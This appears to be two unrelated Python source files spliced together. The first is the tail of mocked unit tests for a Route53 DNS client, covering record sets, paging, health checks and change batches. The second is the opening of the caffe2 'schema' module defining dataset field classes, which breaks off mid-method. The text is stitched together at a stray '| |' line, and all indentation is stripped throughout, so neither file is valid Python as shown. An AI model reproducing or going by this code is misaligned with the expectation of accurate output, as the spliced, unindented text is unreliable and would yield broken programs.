self.assertEqual(no_evaluate_record.name, 'us-west-2-no-evaluate-health.example.com.')
self.assertEqual(no_evaluate_record.type, 'A')
self.assertEqual(no_evaluate_record.identifier, 'latency-example-us-west-2-no-evaluate-health')
self.assertEqual(no_evaluate_record.region, 'us-west-2')
self.assertEqual(no_evaluate_record.alias_hosted_zone_id, 'ABCDEFG567890')
self.assertFalse(no_evaluate_record.alias_evaluate_target_health)
self.assertEqual(no_evaluate_record.alias_dns_name, 'example-123456-no-evaluate-health.us-west-2.elb.amazonaws.com.')
no_evaluate_xml = no_evaluate_record.to_xml()
self.assertTrue(no_evaluate_record.health_check, 'abcdefgh-abcd-abcd-abcd-abcdefghijkl')
self.assertTrue('<EvaluateTargetHealth>false</EvaluateTargetHealth>' in no_evaluate_xml)
failover_record = response[4]
self.assertEqual(failover_record.name, 'failover.example.com.')
self.assertEqual(failover_record.type, 'A')
self.assertEqual(failover_record.identifier, 'failover-primary')
self.assertEqual(failover_record.failover, 'PRIMARY')
self.assertEqual(failover_record.ttl, '60')
healthcheck_record = response[5]
self.assertEqual(healthcheck_record.health_check, '076a32f8-86f7-4c9e-9fa2-c163d5be67d9')
self.assertEqual(healthcheck_record.name, 'us-west-2-evaluate-health-healthcheck.example.com.')
self.assertEqual(healthcheck_record.identifier, 'latency-example-us-west-2-evaluate-health-healthcheck')
self.assertEqual(healthcheck_record.alias_dns_name, 'example-123456-evaluate-health-healthcheck.us-west-2.elb.amazonaws.com.')
@attr(route53=True)
class TestTruncatedGetAllRRSetsRoute53(AWSMockServiceTestCase):
connection_class = Route53Connection
def setUp(self):
super(TestTruncatedGetAllRRSetsRoute53, self).setUp()
def default_body(self):
return b"""
<ListResourceRecordSetsResponse xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
<ResourceRecordSets>
<ResourceRecordSet>
<Name>example.com.</Name>
<Type>NS</Type>
<TTL>900</TTL>
<ResourceRecords>
<ResourceRecord>
<Value>ns-91.awsdns-41.co.uk.</Value>
</ResourceRecord>
<ResourceRecord>
<Value>ns-1929.awsdns-93.net.</Value>
</ResourceRecord>
<ResourceRecord>
<Value>ns-12.awsdns-21.org.</Value>
</ResourceRecord>
<ResourceRecord>
<Value>ns-102.awsdns-96.com.</Value>
</ResourceRecord>
</ResourceRecords>
</ResourceRecordSet>
<ResourceRecordSet>
<Name>example.com.</Name>
<Type>SOA</Type>
<TTL>1800</TTL>
<ResourceRecords>
<ResourceRecord>
<Value>ns-1929.awsdns-93.net. hostmaster.awsdns.net. 1 10800 3600 604800 1800</Value>
</ResourceRecord>
</ResourceRecords>
</ResourceRecordSet>
<ResourceRecordSet>
<Name>wrr.example.com.</Name>
<Type>A</Type>
<SetIdentifier>primary</SetIdentifier>
<Weight>100</Weight>
<TTL>300</TTL>
<ResourceRecords>
<ResourceRecord><Value>127.0.0.1</Value></ResourceRecord>
</ResourceRecords>
</ResourceRecordSet>
</ResourceRecordSets>
<IsTruncated>true</IsTruncated>
<NextRecordName>wrr.example.com.</NextRecordName>
<NextRecordType>A</NextRecordType>
<NextRecordIdentifier>secondary</NextRecordIdentifier>
<MaxItems>3</MaxItems>
</ListResourceRecordSetsResponse>"""
def paged_body(self):
return b"""
<ListResourceRecordSetsResponse xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
<ResourceRecordSets>
<ResourceRecordSet>
<Name>wrr.example.com.</Name>
<Type>A</Type>
<SetIdentifier>secondary</SetIdentifier>
<Weight>50</Weight>
<TTL>300</TTL>
<ResourceRecords>
<ResourceRecord><Value>127.0.0.2</Value></ResourceRecord>
</ResourceRecords>
</ResourceRecordSet>
</ResourceRecordSets>
<IsTruncated>false</IsTruncated>
<MaxItems>3</MaxItems>
</ListResourceRecordSetsResponse>"""
def test_get_all_rr_sets(self):
self.set_http_response(status_code=200)
response = self.service_connection.get_all_rrsets("Z1111", maxitems=3)
# made first request
self.assertEqual(self.actual_request.path, '/2013-04-01/hostedzone/Z1111/rrset?maxitems=3')
# anticipate a second request when we page it
self.set_http_response(status_code=200, body=self.paged_body())
# this should trigger another call to get_all_rrsets
self.assertEqual(len(list(response)), 4)
url_parts = urllib.parse.urlparse(self.actual_request.path)
self.assertEqual(url_parts.path, '/2013-04-01/hostedzone/Z1111/rrset')
self.assertEqual(urllib.parse.parse_qs(url_parts.query),
dict(type=['A'], name=['wrr.example.com.'], identifier=['secondary']))
@attr(route53=True)
class TestCreateHealthCheckRoute53IpAddress(AWSMockServiceTestCase):
connection_class = Route53Connection
def setUp(self):
super(TestCreateHealthCheckRoute53IpAddress, self).setUp()
def default_body(self):
return b"""
<CreateHealthCheckResponse xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
<HealthCheck>
<Id>34778cf8-e31e-4974-bad0-b108bd1623d3</Id>
<CallerReference>2fa48c8f-76ef-4253-9874-8bcb2b0d7694</CallerReference>
<HealthCheckConfig>
<IPAddress>74.125.228.81</IPAddress>
<Port>443</Port>
<Type>HTTPS_STR_MATCH</Type>
<SearchString>OK</SearchString>
<ResourcePath>/health_check</ResourcePath>
<RequestInterval>30</RequestInterval>
<FailureThreshold>3</FailureThreshold>
</HealthCheckConfig>
</HealthCheck>
</CreateHealthCheckResponse>
"""
def test_create_health_check_ip_address(self):
self.set_http_response(status_code=201)
hc = HealthCheck(ip_addr='74.125.228.81', port=443, hc_type='HTTPS_STR_MATCH', resource_path='/health_check', string_match='OK')
hc_xml = hc.to_xml()
self.assertFalse('<FullyQualifiedDomainName>' in hc_xml)
self.assertTrue('<IPAddress>' in hc_xml)
response = self.service_connection.create_health_check(hc)
hc_resp = response['CreateHealthCheckResponse']['HealthCheck']['HealthCheckConfig']
self.assertEqual(hc_resp['IPAddress'], '74.125.228.81')
self.assertEqual(hc_resp['ResourcePath'], '/health_check')
self.assertEqual(hc_resp['Type'], 'HTTPS_STR_MATCH')
self.assertEqual(hc_resp['Port'], '443')
self.assertEqual(hc_resp['ResourcePath'], '/health_check')
self.assertEqual(hc_resp['SearchString'], 'OK')
self.assertEqual(response['CreateHealthCheckResponse']['HealthCheck']['Id'], '34778cf8-e31e-4974-bad0-b108bd1623d3')
@attr(route53=True)
class TestCreateHealthCheckRoute53FQDN(AWSMockServiceTestCase):
connection_class = Route53Connection
def setUp(self):
super(TestCreateHealthCheckRoute53FQDN, self).setUp()
def default_body(self):
return b"""
<CreateHealthCheckResponse xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
<HealthCheck>
<Id>f9abfe10-8d2a-4bbd-8f35-796f0f8572f2</Id>
<CallerReference>3246ac17-b651-4295-a5c8-c132a59693d7</CallerReference>
<HealthCheckConfig>
<Port>443</Port>
<Type>HTTPS</Type>
<ResourcePath>/health_check</ResourcePath>
<FullyQualifiedDomainName>example.com</FullyQualifiedDomainName>
<RequestInterval>30</RequestInterval>
<FailureThreshold>3</FailureThreshold>
</HealthCheckConfig>
</HealthCheck>
</CreateHealthCheckResponse>
"""
def test_create_health_check_fqdn(self):
self.set_http_response(status_code=201)
hc = HealthCheck(ip_addr='', port=443, hc_type='HTTPS', resource_path='/health_check', fqdn='example.com')
hc_xml = hc.to_xml()
self.assertTrue('<FullyQualifiedDomainName>' in hc_xml)
self.assertFalse('<IPAddress>' in hc_xml)
response = self.service_connection.create_health_check(hc)
hc_resp = response['CreateHealthCheckResponse']['HealthCheck']['HealthCheckConfig']
self.assertEqual(hc_resp['FullyQualifiedDomainName'], 'example.com')
self.assertEqual(hc_resp['ResourcePath'], '/health_check')
self.assertEqual(hc_resp['Type'], 'HTTPS')
self.assertEqual(hc_resp['Port'], '443')
self.assertEqual(hc_resp['ResourcePath'], '/health_check')
self.assertEqual(response['CreateHealthCheckResponse']['HealthCheck']['Id'], 'f9abfe10-8d2a-4bbd-8f35-796f0f8572f2')
@attr(route53=True)
class TestChangeResourceRecordSetsRoute53(AWSMockServiceTestCase):
connection_class = Route53Connection
def setUp(self):
super(TestChangeResourceRecordSetsRoute53, self).setUp()
def default_body(self):
return b"""
<ChangeResourceRecordSetsResponse xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
<ChangeInfo>
<Id>/change/C1111111111111</Id>
<Status>PENDING</Status>
<SubmittedAt>2014-05-05T10:11:12.123Z</SubmittedAt>
</ChangeInfo>
</ChangeResourceRecordSetsResponse>
"""
def test_record_commit(self):
rrsets = ResourceRecordSets(self.service_connection)
rrsets.add_change_record('CREATE', Record('vanilla.example.com', 'A', 60, ['1.2.3.4']))
rrsets.add_change_record('CREATE', Record('alias.example.com', 'AAAA', alias_hosted_zone_id='Z123OTHER', alias_dns_name='target.other', alias_evaluate_target_health=True))
rrsets.add_change_record('CREATE', Record('wrr.example.com', 'CNAME', 60, ['cname.target'], weight=10, identifier='weight-1'))
rrsets.add_change_record('CREATE', Record('lbr.example.com', 'TXT', 60, ['text record'], region='us-west-2', identifier='region-1'))
rrsets.add_change_record('CREATE', Record('failover.example.com', 'A', 60, ['2.2.2.2'], health_check='hc-1234', failover='PRIMARY', identifier='primary'))
changes_xml = rrsets.to_xml()
# the whitespacing doesn't match exactly, so we'll pretty print and drop all new lines
# not the best, but
actual_xml = re.sub(r"\s*[\r\n]+", "\n", xml.dom.minidom.parseString(changes_xml).toprettyxml())
expected_xml = re.sub(r"\s*[\r\n]+", "\n", xml.dom.minidom.parseString(b"""
<ChangeResourceRecordSetsRequest xmlns="https://route53.amazonaws.com/doc/2013-04-01/">
<ChangeBatch>
<Comment>None</Comment>
<Changes>
<Change>
<Action>CREATE</Action>
<ResourceRecordSet>
<Name>vanilla.example.com</Name>
<Type>A</Type>
<TTL>60</TTL>
<ResourceRecords>
<ResourceRecord>
<Value>1.2.3.4</Value>
</ResourceRecord>
</ResourceRecords>
</ResourceRecordSet>
</Change>
<Change>
<Action>CREATE</Action>
<ResourceRecordSet>
<Name>alias.example.com</Name>
<Type>AAAA</Type>
<AliasTarget>
<HostedZoneId>Z123OTHER</HostedZoneId>
<DNSName>target.other</DNSName>
<EvaluateTargetHealth>true</EvaluateTargetHealth>
</AliasTarget>
</ResourceRecordSet>
</Change>
<Change>
<Action>CREATE</Action>
<ResourceRecordSet>
<Name>wrr.example.com</Name>
<Type>CNAME</Type>
<SetIdentifier>weight-1</SetIdentifier>
<Weight>10</Weight>
<TTL>60</TTL>
<ResourceRecords>
<ResourceRecord>
<Value>cname.target</Value>
</ResourceRecord>
</ResourceRecords>
</ResourceRecordSet>
</Change>
<Change>
<Action>CREATE</Action>
<ResourceRecordSet>
<Name>lbr.example.com</Name>
<Type>TXT</Type>
<SetIdentifier>region-1</SetIdentifier>
<Region>us-west-2</Region>
<TTL>60</TTL>
<ResourceRecords>
<ResourceRecord>
<Value>text record</Value>
</ResourceRecord>
</ResourceRecords>
</ResourceRecordSet>
</Change>
<Change>
<Action>CREATE</Action>
<ResourceRecordSet>
<Name>failover.example.com</Name>
<Type>A</Type>
<SetIdentifier>primary</SetIdentifier>
<Failover>PRIMARY</Failover>
<TTL>60</TTL>
<ResourceRecords>
<ResourceRecord>
<Value>2.2.2.2</Value>
</ResourceRecord>
</ResourceRecords>
<HealthCheckId>hc-1234</HealthCheckId>
</ResourceRecordSet>
</Change>
</Changes>
</ChangeBatch>
</ChangeResourceRecordSetsRequest>
""").toprettyxml())
# Note: the alias XML should not include the TTL, even if it's specified in the object model
self.assertEqual(actual_xml, expected_xml)
| |
## @package schema
# Module caffe2.python.schema
"""
Defines a minimal set of data types that allow to represent datasets with
arbitrary nested structure, including objects of variable length, such as
maps and lists.
This defines a columnar storage format for such datasets on top of caffe2
tensors. In terms of capacity of representation, it can represent most of
the data types supported by Parquet, ORC, DWRF file formats.
See comments in operator_test/dataset_ops_test.py for an example and
walkthrough on how to use schema to store and iterate through a structured
in-memory dataset.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import numpy as np
from caffe2.python import core
from caffe2.python import workspace
from caffe2.python.core import BlobReference
from collections import OrderedDict, namedtuple
from past.builtins import basestring
from future.utils import viewitems, viewkeys, viewvalues
from itertools import islice
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
FIELD_SEPARATOR = ':'
def _join_field_name(prefix, suffix):
if prefix and suffix:
return '{}{}{}'.format(prefix, FIELD_SEPARATOR, suffix)
elif prefix:
return prefix
elif suffix:
return suffix
else:
return ''
def _normalize_field(field_or_type_or_blob, keep_blobs=True):
"""Clones/normalizes a field before adding it to a container."""
if isinstance(field_or_type_or_blob, Field):
return field_or_type_or_blob.clone(keep_blobs=keep_blobs)
elif type(field_or_type_or_blob) in (type, np.dtype):
return Scalar(dtype=field_or_type_or_blob)
else:
return Scalar(blob=field_or_type_or_blob)
FeatureSpec = namedtuple(
'FeatureSpec',
[
'feature_type',
'feature_names',
'feature_ids',
'feature_is_request_only',
'desired_hash_size',
]
)
FeatureSpec.__new__.__defaults__ = (None, None, None, None, None)
class Metadata(
namedtuple(
'Metadata', ['categorical_limit', 'expected_value', 'feature_specs']
)
):
"""Represents additional information associated with a scalar in schema.
`categorical_limit` - for fields of integral type that are guaranteed to be
non-negative it specifies the maximum possible value plus one. It's often
used as a size of an embedding table.
`expected_value` - anticipated average value of elements in the field.
Usually makes sense for length fields of lists.
`feature_specs` - information about the features that contained in this
field. For example if field have more than 1 feature it can have list of
feature names contained in this field."""
__slots__ = ()
Metadata.__new__.__defaults__ = (None, None, None)
class Field(object):
"""Represents an abstract field type in a dataset.
"""
def __init__(self, children):
"""Derived classes must call this after their initialization."""
self._parent = (None, 0)
offset = 0
self._field_offsets = []
for child in children:
self._field_offsets.append(offset)
offset += len(child.field_names())
self._field_offsets.append(offset)
def clone_schema(self):
return self.clone(keep_blobs=False)
def field_names(self):
"""Return the children field names for this field."""
raise NotImplementedError('Field is an abstract class.')
def field_types(self):
"""Return the numpy.dtype for each of the children fields."""
raise NotImplementedError('Field is an abstract class.')
def field_metadata(self):
"""Return the Metadata for each of the children fields."""
raise NotImplementedError('Field is an abstract class.')
def field_blobs(self):
"""Return the list of blobs with contents for this Field.
Values can either be all numpy.ndarray or BlobReference.
If any of the fields doens't have a blob, throws.
"""
raise NotImplementedError('Field is an abstract class.')
def all_scalars(self):
"""Return the list of all Scalar instances in the Field.
The order is the same as for field_names() or field_blobs()"""
raise NotImplementedError('Field is an abstract class.')
def has_blobs(self):
"""Return True if every scalar of this field has blobs."""
raise NotImplementedError('Field is an abstract class.')
def clone(self, keep_blobs=True):
"""Clone this Field along with its children."""
raise NotImplementedError('Field is an abstract class.')
def _set_parent(self, parent, relative_id):
self._parent = (parent, relative_id)
def slice(self):
"""
Returns a slice representing the range of field ids that belong to
this field. This slice can be used to index a list of fields.
E.g.:
>>> s = Struct(
>>> ('a', Scalar()),
>>> ('b', Struct(
>>> ('b1', Scalar()),
>>> ('b2', Scalar()),
>>> )),
>>> ('c', Scalar()),
>>> )
>>> field_data = ['da', 'db1', 'db2', 'dc']
>>> field_data[s.b.split()]
['db1', 'db2']
"""
base_id = self._child_base_id()
return slice(base_id, base_id + len(self.field_names()))
def _child_base_id(self, child_index=None):
"""Get the base id of the given child"""
p, i = self._parent
pos = 0 if child_index is None else self._field_offsets[child_index]
if p:
pos += p._child_base_id(i)
return pos
def __eq__(self, other):
"""Equivalance of two schemas"""
return (
(self.field_names() == other.field_names()) and
(self.field_types() == other.field_types()) and
(self.field_metadata() == other.field_metadata())
)
class List(Field):
"""Represents a variable-length list.
Values of a list can also be complex fields such as Lists and Structs.
In addition to the fields exposed by its `values` field, a List exposes an
additional `lengths` field, which will contain the size of each list under
the parent domain.
"""
def __init__(self, values, lengths_blob=None):
if isinstance(lengths_blob, Field):
assert isinstance(lengths_blob, Scalar)
self.lengths = _normalize_field(lengths_blob)
else:
self.lengths = Scalar(np.int32, lengths_blob)
self._items = _normalize_field(values)
self.lengths._set_parent(self, 0)
self._items._set_parent(self, 1)
Field.__init__(self, [self.lengths, self._items])
def field_names(self):
value_fields = self._items.field_names()
return (
['lengths'] + [_join_field_name('values', v) for v in value_fields]
)
def field_types(self):
return self.lengths.field_types() + self._items.field_types()
def field_metadata(self):
return self.lengths.field_metadata() + self._items.field_metadata()
def field_blobs(self):
return self.lengths.field_blobs() + self._items.field_blobs()
def all_scalars(self):
return self.lengths.all_scalars() + self._items.all_scalars()
def has_blobs(self):
return self.lengths.has_blobs() and self._items.has_blobs()
def clone(self, keep_blobs=True):
return List(
_normalize_field(self._items, keep_blobs=keep_blobs),
_normalize_field(self.lengths, keep_blobs=keep_blobs)
)
def __repr__(self):
return "List(lengths={!r}, _items={!r})".format(
self.lengths, self._items)
def __getattr__(self, item):
"""If the value of this list is a struct,
allow to introspect directly into its fields."""
if item.startswith('__'):
raise AttributeError(item)
if isinstance(self._items, Struct):
return getattr(self._items, item)
elif item == 'value' or item == 'items':
return self._items
else:
raise AttributeError('Field not found in list: %s.' % item)
def __getitem__(self, item):
names = item.split(FIELD_SEPARATOR, 1)
if len(names) == 1:
if item == 'lengths':
return self.lengths
elif item == 'values':
return self._items
else:
if names[0] == 'values':
return self._items[names[1]]
raise KeyError('Field not found in list: %s.' % item)
class Struct(Field):
"""Represents a named list of fields sharing the same domain.
"""
def __init__(self, *fields):
""" fields is a list of tuples in format of (name, field). The name is
a string of nested name, e.g., `a`, `a:b`, `a:b:c`. For example
Struct(
('a', Scalar()),
('b:c', Scalar()),
('b:d:e', Scalar()),
('b', Struct(
('f', Scalar()),
)),
)
is equal to
Struct(
('a', Scalar()),
('b', Struct(
('c', Scalar()),
('d', Struct(('e', Scalar()))),
('f', Scalar()),
)),
)
"""
for field in fields:
assert len(field) == 2
assert field[0], 'Field names cannot be empty'
assert field[0] != 'lengths', (
'Struct cannot contain a field named `lengths`.'
)
fields = [(name, _normalize_field(field)) for name, field in fields]
self.fields = OrderedDict()
for name, field in fields:
# if name == 'dense':
# import pdb; pdb.set_trace()
if FIELD_SEPARATOR in name:
name, field = self._struct_from_nested_name(name, field)
if name not in self.fields:
self.fields[name] = field
continue
if (
not isinstance(field, Struct) or
not isinstance(self.fields[name], Struct)
):
raise ValueError('Duplicate field name: %s' % name)
self.fields[name] = self.fields[name] + field
for id, (_, field) in enumerate(viewitems(self.fields)):
field._set_parent(self, id)
Field.__init__(self, viewvalues(self.fields))
self._frozen = True
def _struct_from_nested_name(self, nested_name, field):
def create_internal(nested_name, field):
names = nested_name.split(FIELD_SEPARATOR, 1)
if len(names) == 1:
added_field = field
else:
added_field = create_internal(names[1], field)
return Struct((names[0], added_field))
names = nested_name.split(FIELD_SEPARATOR, 1)
assert len(names) >= 2
return names[0], create_internal(names[1], field)
def get_children(self):
return list(viewitems(self.fields))
def field_names(self):
names = []
for name, field in viewitems(self.fields):
names += [_join_field_name(name, f) for f in field.field_names()]
return names
def field_types(self):
types = []
for _, field in viewitems(self.fields):
types += field.field_types()
return types
def field_metadata(self):
metadata = []
for _, field in viewitems(self.fields):
metadata += field.field_metadata()
return metadata
def field_blobs(self):
blobs = []
for _, field in viewitems(self.fields):
blobs += field.field_blobs()
return blobs
def all_scalars(self):
scalars = []
for _, field in viewitems(self.fields):
scalars += field.all_scalars()
return scalars
def has_blobs(self):
return all(field.has_blobs() for field in viewvalues(self.fields))
def clone(self, keep_blobs=True):
normalized_fields = [
(k, _normalize_field(v, keep_blobs=keep_blobs))
for k, v in viewitems(self.fields)
]
return Struct(*normalized_fields)
def _get_field_by_nested_name(self, nested_name):
names = nested_name.split(FIELD_SEPARATOR, 1)
field = self.fields.get(names[0], None)
if field is None:
return None
if len(names) == 1:
return field
try:
return field[names[1]]
except (KeyError, TypeError):
return None
def __repr__(self):
return "Struct({})".format(
', '.join(
"{}={!r}".format(name, field)
for name, field in viewitems(self.fields)
)
)
def __contains__(self, item):
field = self._get_field_by_nested_name(item)
return field is not None
def __len__(self):
return len(self.fields)
def __getitem__(self, item):
"""
item can be a tuple or list of ints or strings, or a single
int or string. String item is a nested field name, e.g., "a", "a:b",
"a:b:c". Int item is the index of a field at the first level of the
Struct.
"""
if isinstance(item, list) or isinstance(item, tuple):
keys = list(viewkeys(self.fields))
return Struct(
* [
(
keys[k]
if isinstance(k, int) else k, self[k]
) for k in item
]
)
elif isinstance(item, int):
return next(islice(viewvalues(self.fields), item, None))
else:
field = self._get_field_by_nested_name(item)
if field is None:
raise KeyError('field "%s" not found' % (item))
return field
def __getattr__(self, item):
if item.startswith('__'):
raise AttributeError(item)
try:
return self.__dict__['fields'][item]
except KeyError:
raise AttributeError(item)
def __setattr__(self, key, value):
# Disable setting attributes after initialization to prevent false
# impression of being able to overwrite a field.
# Allowing setting internal states mainly so that _parent can be set
# post initialization.
if getattr(self, '_frozen', None) and not key.startswith('_'):
raise TypeError('Struct.__setattr__() is disabled after __init__()')
super(Struct, self).__setattr__(key, value)
def __add__(self, other):
"""
Allows to merge fields of two schema.Struct using '+' operator.
If two Struct have common field names, the merge is conducted
recursively. Here are examples:
Example 1
s1 = Struct(('a', Scalar()))
s2 = Struct(('b', Scalar()))
s1 + s2 == Struct(
('a', Scalar()),
('b', Scalar()),
)
Example 2
s1 = Struct(
('a', Scalar()),
('b', Struct(('c', Scalar()))),
)
s2 = Struct(('b', Struct(('d', Scalar()))))
s1 + s2 == Struct(
('a', Scalar()),
('b', Struct(
('c', Scalar()),
('d', Scalar()),
)),
)
"""
if not isinstance(other, Struct):
return NotImplemented
children = OrderedDict(self.get_children())
for name, right_field in other.get_children():
if name not in children:
children[name] = right_field
continue
left_field = children[name]
children[name] = left_field + right_field
return Struct(*(viewitems(children)))
def __sub__(self, other):
"""
Allows to remove common fields of two schema.Struct from self by
using '-' operator. If two Struct have common field names, the
removal is conducted recursively. If a child struct has no fields
inside, it will be removed from its parent. Here are examples:
Example 1
s1 = Struct(
('a', Scalar()),
('b', Scalar()),
)
s2 = Struct(('a', Scalar()))
s1 - s2 == Struct(('b', Scalar()))
Example 2
s1 = Struct(
('b', Struct(
('c', Scalar()),
('d', Scalar()),
))
)
s2 = Struct(
('b', Struct(('c', Scalar()))),
)
s1 - s2 == Struct(
('b', Struct(
('d', Scalar()),
)),
)
Example 3
s1 = Struct(
('a', Scalar()),
('b', Struct(
('d', Scalar()),
))
)
s2 = Struct(
('b', Struct(
('c', Scalar())
('d', Scalar())
)),
)
s1 - s2 == Struct(
('a', Scalar()),
)
"""
if not isinstance(other, Struct):
return NotImplemented
children = OrderedDict(self.get_children())
for name, right_field in other.get_children():
if name in children:
left_field = children[name]
if type(left_field) == type(right_field):
if isinstance(left_field, Struct):
child = left_field - right_field
if child.get_children():
children[name] = child
continue
children.pop(name)
else:
raise TypeError(
"Type of left_field, " + str(type(left_field)) +
", is not the same as that of right_field, " +
str(type(right_field)) +
", yet they have the same field name, " + name)
return Struct(*(children.items()))
class Scalar(Field):
"""Represents a typed scalar or tensor of fixed shape.
A Scalar is a leaf in a schema tree, translating to exactly one tensor in
the dataset's underlying storage.
Usually, the tensor storing the actual values of this field is a 1D tensor,
representing a series of values in its domain. It is possible however to
have higher rank values stored as a Scalar, as long as all entries have
the same shape.
E.g.:
Scalar(np.float64)
Scalar field of type float32. Caffe2 will expect readers and
datasets to expose it as a 1D tensor of doubles (vector), where
the size of the vector is determined by this fields' domain.
Scalar((np.int32, 5))
Tensor field of type int32. Caffe2 will expect readers and
datasets to implement it as a 2D tensor (matrix) of shape (L, 5),
where L is determined by this fields' domain.
Scalar((str, (10, 20)))
Tensor field of type str. Caffe2 will expect readers and
datasets to implement it as a 3D tensor of shape (L, 10, 20),
where L is determined by this fields' domain.
If the field type is unknown at construction time, call Scalar(), that will
default to np.void as its dtype.
It is an error to pass a structured dtype to Scalar, since it would contain
more than one field. Instead, use from_dtype, which will construct
a nested `Struct` field reflecting the given dtype's structure.
A Scalar can also contain a blob, which represents the value of this
Scalar. A blob can be either a numpy.ndarray, in which case it contain the
actual contents of the Scalar, or a BlobReference, which represents a
blob living in a caffe2 Workspace. If blob of different types are passed,
a conversion to numpy.ndarray is attempted.
"""
def __init__(self, dtype=None, blob=None, metadata=None):
self._metadata = None
self.set(dtype, blob, metadata, unsafe=True)
Field.__init__(self, [])
def field_names(self):
return ['']
def field_type(self):
return self.dtype
def field_types(self):
return [self.dtype]
def field_metadata(self):
return [self._metadata]
def has_blobs(self):
return self._blob is not None
def field_blobs(self):
assert self._blob is not None, 'Value is not set for this field.'
return [self._blob]
def all_scalars(self):
return [self]
def clone(self, keep_blobs=True):
return Scalar(
dtype=self._original_dtype,
blob=self._blob if keep_blobs else None,
metadata=self._metadata
)
def get(self):
"""Gets the current blob of this Scalar field."""
assert self._blob is not None, 'Value is not set for this field.'
return self._blob
def __call__(self):
"""Shortcut for self.get()"""
return self.get()
@property
def metadata(self):
return self._metadata
def set_metadata(self, value):
assert isinstance(value, Metadata), \
'metadata must be Metadata, got {}'.format(type(value))
self._metadata = value
self._validate_metadata()
def _validate_metadata(self):
if self._metadata is None:
return
if (self._metadata.categorical_limit is not None and
self.dtype is not None):
assert np.issubdtype(self.dtype, np.integer), \
"`categorical_limit` can be specified only in integral " + \
"fields but got {}".format(self.dtype)
def set_value(self, blob, throw_on_type_mismatch=False, unsafe=False):
"""Sets only the blob field still validating the existing dtype"""
if self.dtype.base != np.void and throw_on_type_mismatch:
assert isinstance(blob, np.ndarray), "Got {!r}".format(blob)
assert blob.dtype.base == self.dtype.base, (
"Expected {}, got {}".format(self.dtype.base, blob.dtype.base))
self.set(dtype=self._original_dtype, blob=blob, unsafe=unsafe)
def set(self, dtype=None, blob=None, metadata=None, unsafe=False):
"""Set the type and/or blob of this scalar. See __init__ for details.
Args:
dtype: can be any numpy type. If not provided and `blob` is
provided, it will be inferred. If no argument is provided,
this Scalar will be of type np.void.
blob: if provided, can be either a BlobReference or a
numpy.ndarray. If a value of different type is passed,
a conversion to numpy.ndarray is attempted. Strings aren't
accepted, since they can be ambiguous. If you want to pass
a string, to either BlobReference(blob) or np.array(blob).
metadata: optional instance of Metadata, if provided overrides
the metadata information of the scalar
"""
if not unsafe:
logger.warning(
"Scalar should be considered immutable. Only call Scalar.set() "
"on newly created Scalar with unsafe=True. This will become an "
"error soon."
)
if blob is not None and isinstance(blob, basestring):
raise ValueError(
'Passing str blob to Scalar.set() is ambiguous. '
'Do either set(blob=np.array(blob)) or '
'set(blob=BlobReference(blob))'
)
self._original_dtype = dtype
if dtype is not None:
dtype = np.dtype(dtype)
# If blob is not None and it is not a BlobReference, we assume that
# it is actual tensor data, so we will try to cast it to a numpy array.
if blob is not None and not isinstance(blob, BlobReference):
preserve_shape = isinstance(blob, np.ndarray)
if dtype is not None and dtype != np.void:
blob = np.array(blob, dtype=dtype.base)
# if array is empty we may need to reshape a little
if blob.size == 0 and not preserve_shape:
blob = blob.reshape((0, ) + dtype.shape)
else:
assert isinstance(blob, np.ndarray), (
'Invalid blob type: %s' % str(type(blob)))
# reshape scalars into 1D arrays
# TODO(azzolini): figure out better way of representing this
if len(blob.shape) == 0 and not preserve_shape:
blob = blob.reshape((1, ))
# infer inner shape from the blob given
# TODO(dzhulgakov): tweak this to make it work with PackedStruct
if (len(blob.shape) > 1 and dtype is not None and
dtype.base != np.void):
dtype = np.dtype((dtype.base, blob.shape[1:]))
# if we were still unable to infer the dtype
if dtype is None:
dtype = np.dtype(np.void)
assert not dtype.fields, (
'Cannot create Scalar with a structured dtype. ' +
'Use from_dtype instead.'
)
self.dtype = dtype
self._blob = blob
if metadata is not None:
self.set_metadata(metadata)
self._validate_metadata()
def set_type(self, dtype):
self._original_dtype = dtype
if dtype is not None:
self.dtype = np.dtype(dtype)
else:
self.dtype = np.dtype(np.void)
self._validate_metadata()
def __repr__(self):
return 'Scalar({!r}, {!r}, {!r})'.format(
self.dtype, self._blob, self._metadata)
def id(self):
"""
Return the zero-indexed position of this scalar field in its schema.
Used in order to index into the field_blob list returned by readers or
accepted by writers.
"""
return self._child_base_id()
def Map(
keys,
values,
keys_name='keys',
values_name='values',
lengths_blob=None
):
"""A map is a List of Struct containing keys and values fields.
Optionally, you can provide custom name for the key and value fields.
"""
return List(
Struct((keys_name, keys), (values_name, values)),
lengths_blob=lengths_blob
)
def NamedTuple(name_prefix, *fields):
return Struct(* [('%s_%d' % (name_prefix, i), field)
for i, field in enumerate(fields)])
def Tuple(*fields):
"""
Creates a Struct with default, sequential, field names of given types.
"""
return NamedTuple('field', *fields)
def RawTuple(num_fields, name_prefix='field'):
"""
Creates a tuple of `num_field` untyped scalars.
"""
assert isinstance(num_fields, int)
assert num_fields >= 0
return NamedTuple(name_prefix, *([np.void] * num_fields))
def from_dtype(dtype, _outer_shape=()):
"""Constructs a Caffe2 schema from the given numpy's dtype.
Numpy supports scalar, array-like and structured datatypes, as long as
all the shapes are fixed. This function breaks down the given dtype into
a Caffe2 schema containing `Struct` and `Scalar` types.
Fields containing byte offsets are not currently supported.
"""
if not isinstance(dtype, np.dtype):
# wrap into a ndtype
shape = _outer_shape
dtype = np.dtype((dtype, _outer_shape))
else:
# concatenate shapes if necessary
shape = _outer_shape + dtype.shape
if shape != dtype.shape:
dtype = np.dtype((dtype.base, shape))
if not dtype.fields:
return Scalar(dtype)
struct_fields = []
for name, (fdtype, offset) in dtype.fields:
assert offset == 0, ('Fields with byte offsets are not supported.')
struct_fields += (name, from_dtype(fdtype, _outer_shape=shape))
return Struct(*struct_fields)
class _SchemaNode(object):
"""This is a private class used to represent a Schema Node"""
def __init__(self, name, type_str=''):
self.name = name
self.children = []
self.type_str = type_str
self.field = None
def add_child(self, name, type_str=''):
for child in self.children:
if child.name == name and child.type_str == type_str:
return child
child = _SchemaNode(name, type_str)
self.children.append(child)
return child
def get_field(self):
list_names = ['lengths', 'values']
map_names = ['lengths', 'keys', 'values']
if len(self.children) == 0 or self.field is not None:
assert self.field is not None
return self.field
child_names = []
